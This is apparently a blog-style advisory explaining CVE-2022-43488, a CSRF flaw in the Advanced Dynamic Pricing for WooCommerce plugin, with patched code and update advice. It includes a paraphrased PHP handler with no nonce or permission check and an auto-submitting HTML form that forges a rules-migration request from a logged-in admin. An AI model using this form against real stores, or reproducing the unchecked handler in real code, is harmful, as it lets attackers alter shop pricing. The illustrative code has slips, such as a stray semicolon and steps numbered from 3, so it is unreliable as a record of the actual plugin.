CVE-2022-43488 - CSRF in Advanced Dynamic Pricing for WooCommerce <= 4.1.5 Allows Unauthorized Pricing Rules Migration

In October 2022, a security vulnerability (CVE-2022-43488) was disclosed for the Advanced Dynamic Pricing for WooCommerce WordPress plugin, affecting versions up to 4.1.5. This bug lets attackers perform Cross-Site Request Forgery (CSRF) and change pricing rule types without the admin's consent—potentially damaging to your online store’s integrity and sales process.

This long read gives an accessible, exclusive breakdown of how the bug works, what’s at risk, reference links, and actual exploit details (with code).

What is CSRF?

Cross-Site Request Forgery (CSRF) is when a hacker tricks someone logged into a website (like a WordPress admin) into clicking a bad link or visiting a booby-trapped page. This can make the victim’s browser send unauthorized requests—like changing settings or moving money—without them even knowing.

Vulnerability Summary

There’s no CSRF check (no nonce verification) for a function that lets users migrate pricing rule types. If an attacker tricks an admin into clicking a link, the attacker's crafted POST request can execute as-if performed by the admin.  
The core of the problem: *The plugin doesn’t confirm if pricing rule migrations are being triggered by a real admin, or by someone faking their browser.*

In affected versions, the migration logic sits in a function like this (paraphrased for clarity)

// In one of the plugin’s admin files
if (isset($_POST['action']) && $_POST['action'] === 'migrate_rules') {
    // No check for current_user_can() or wp_verify_nonce()!
    $rules = $_POST['rules'];
    migrate_rule_types($rules); // changes pricing rules
    echo 'Migration done!';
    exit;
}

Attack page: The attacker creates a malicious HTML page like this

<form id="csrf" action="https://victim-woocommerce-site.com/wp-admin/admin.php?page=alg_wc_product_pp&tab=rules"; method="POST">
  <input type="hidden" name="action" value="migrate_rules">
  <input type="hidden" name="rules" value="['change_this','to_that']">
</form>
<script>
document.getElementById('csrf').submit();
</script>

3. If the admin is tricked into visiting this page, the form auto-submits, and the admin’s browser sends a POST request as if *they* requested a rules migration. The plugin accepts it, even though the admin never intended to change anything.

4. As a result, crucial store discounts (like a big “Buy 1 Get 1 Free” rule) could disappear or be altered instantly.

Original References

- Wordfence Threat Intelligence Report
- WPScan Vulnerability Database
- NVD - National Vulnerability Database Entry
- Plugin Changelog – Fixes in 4.1.6

Update the Plugin: Version 4.1.6 and later add proper CSRF protection.

- Verify Nonce: Always check for a proper security nonce in any code handling critical POST requests.

Example of fixed code

if (isset($_POST['action']) && $_POST['action'] === 'migrate_rules') {
    check_admin_referer('migrate_rules_nonce');
    if (current_user_can('manage_woocommerce')) {
        $rules = $_POST['rules'];
        migrate_rule_types($rules);
        echo 'Migration done!';
    }
    exit;
}

Final Thoughts

CVE-2022-43488 reminds us that even popular, useful plugins can have critical, easy-to-exploit vulnerabilities. A simple missing nonce or permission check can expose your business to serious harm. Always keep software up to date and stay alert for official security notices.

If you want to dig deeper, check the following resources for more technical details

- OWASP CSRF Guide
- WordPress Plugin Security Best Practices

Timeline

Published on: 11/09/2022 16:15:00 UTC
Last modified on: 11/09/2022 16:41:00 UTC